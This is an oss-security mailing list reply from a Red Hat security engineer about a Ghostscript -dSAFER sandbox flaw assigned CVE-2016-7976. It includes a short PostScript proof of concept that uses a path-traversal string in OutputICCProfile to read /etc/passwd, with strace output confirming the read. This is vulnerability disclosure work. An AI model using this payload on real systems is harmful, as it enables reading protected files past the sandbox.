oss-sec mailing list archives
Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems
From: Cedric Buissart <cbuissar () redhat com>
Date: Wed, 19 Oct 2016 16:29:43 +0200
On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign () mitre org> wrote:
bug: various userparams allow %pipe% in paths, allowing remote shell command execution. id: http://bugs.ghostscript.com/show_bug.cgi?id=697178 repro: http://www.openwall.com/lists/oss-security/2016/09/30/8 patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=71ac87493b1e445d6c07554d4246cf7d4f44875c Use CVE-2016-7976. There currently isn't a separate CVE ID for the earlier impact that occurred when "b" was in the mode argument to popen. The question of whether popen will execute anyway (even with the 'b" character) is, more or less, a reachability concern in this context, and doesn't mean that a second vulnerability needs to be defined. The original report for this bug (http://bugs.ghostscript.com/
show_bug.cgi?id=697178), as described by Florian, was mentioning a directory traversal issue. The directory traversal does not appear to be resolved after applying the given patch : $ cat putdevice-open.ps %!PS currentdevice null true mark /OutputICCProfile (../../../../../etc/passwd) .putdeviceparams quit $ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 6 Is it expected ? -- Cedric Buissart, Product Security
Current thread:
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems, (continued)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Hanno Böck (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Hanno Böck (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Hanno Böck (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Bob Friesenhahn (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Hanno Böck (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Jakub Wilk (Oct 05)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Florian Weimer (Oct 05)
- Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Cedric Buissart (Oct 19)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems Tavis Ormandy (Oct 11)
- Re: CVE Request - multiple ghostscript -dSAFER sandbox problems cve-assign (Oct 11)